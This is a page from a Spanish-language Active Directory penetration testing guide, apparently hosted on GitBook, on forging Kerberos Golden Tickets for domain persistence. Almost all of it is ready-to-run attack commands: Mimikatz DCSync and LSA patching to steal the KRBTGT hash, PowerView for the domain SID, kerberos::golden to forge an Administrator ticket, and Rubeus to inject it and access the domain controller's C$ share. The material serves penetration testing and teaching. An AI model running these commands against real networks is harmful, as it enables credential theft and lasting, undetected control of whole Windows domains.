馃數
Active Directory Penetration Testing
  • Inicio
  • General
    • Recursos de aprendizaje
    • Herramientas
  • Recolecci贸n de informaci贸n y enumeraci贸n
    • Bypass protecciones PowerShell scripts
    • LLMNR/NBT-NS poisoning
    • Enumeraci贸n no autenticada
      • Enumeraci贸n de usuarios y grupos
      • Enumeraci贸n de pol铆tica de contrase帽as
    • Password spraying
    • Enumeraci贸n autenticada
      • BloodHound
      • Domain Name System (DNS)
      • Enumeraci贸n de dominios
      • Enumeraci贸n de usuarios, grupos y computadoras
      • Enumeraci贸n de recursos compartidos
      • Enumeraci贸n de pol铆tica de contrase帽as
      • Enumeraci贸n de Group Policy Object (GPO)
      • Enumeraci贸n de Access Control List (ACL)
      • Enumeraci贸n de relaciones de confianza de dominio
  • Movimiento lateral
    • User hunting
    • Microsoft SQL Server (MSSQL)
    • PowerShell remoting
    • Remote Desktop Protocol (RDP)
    • Server Message Block (SMB)
    • Windows Remote Management (WinRM)
    • Pass the Hash (PtH)
    • Pass the Ticket (PtT)
  • Escalamiento de privilegios de dominio
    • Configuraciones incorrectas
    • Credential dumping
    • Usuarios y grupos
    • ASREPRoast
    • Kerberoast
    • DCSync
    • Unconstrained delegation
    • Constrained delegation
  • Escalamiento de privilegios en relaciones de confianza de dominio
    • Kerberoast
    • Foreign group membership
    • SID History
  • Persistencia
    • Golden Ticket
    • Silver Ticket
    • Skeleton Key
    • Directory Services Restore Mode (DSRM)
  • Vulnerabilidades
    • NoPac
    • PrintNightmare
Con tecnolog铆a de GitBook
En esta p谩gina
  • Descripci贸n
  • Windows
  • Mimikatz
  • Invoke-Mimikatz

驴Te fue 煤til?

  1. Persistencia

Golden Ticket

Descripci贸n

Un Golden Ticket es un Ticket Granting Ticket (TGT) falsificado, firmado por la cuenta KRBTGT del dominio.

Windows

Mimikatz

1) Obtenci贸n de hash NT de usuario KRBTGT con Mimikatz.

.\mimikatz.exe
lsadump::dcsync /user:<ACME.LOCAL>\krbtgt

2) Obtenci贸n de SID del dominio (actual).

# PowerView
Get-DomainSID

3) Creaci贸n de Golden Ticket con Mimikatz.

.\mimikatz.exe
kerberos::golden /user:Administrator /domain:<ACME.LOCAL> /sid:<SID-domain> /krbtgt:<NT-hash-user-KRBTGT> /ticket:golden-ticket.kirbi

4) Importar Golden Ticket en sesi贸n con Rubeus.

.\Rubeus.exe createnetonly /program:cmd.exe /show
.\Rubeus.exe ptt /ticket:golden-ticket.kirbi
dir \\<DC01.ACME.LOCAL>\C$

Invoke-Mimikatz

1) Obtenci贸n de hash NT de usuario KRBTGT y SID del dominio con Invoke-Mimikatz.

$session = New-PSSession -ComputerName <computer-name-DC>
Invoke-Command -FilePath C:\<path>\Invoke-Mimikatz.ps1 -Session $session
Enter-PSSession -Session $session
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'

2) Creaci贸n de Golden Ticket con Invoke-Mimikatz.

# Inyecta el ticket en el proceso actual de PowerShell
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:<ACME.LOCAL> /sid:<SID-domain> /krbtgt:<NT-hash-user-KRBTGT> /ptt"'

# Realiza el guardado del Golden Ticket
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:<ACME.LOCAL> /sid:<SID-domain> /krbtgt:<NT-hash-user-KRBTGT> /ticket:golden-ticket.kirbi"'

3) Importar Golden Ticket en sesi贸n con Rubeus.

.\Rubeus.exe createnetonly /program:cmd.exe /show
.\Rubeus.exe ptt /ticket:golden-ticket.kirbi
dir \\<DC01.ACME.LOCAL>\C$
AnteriorSID HistorySiguienteSilver Ticket

脷ltima actualizaci贸n hace 2 a帽os

驴Te fue 煤til?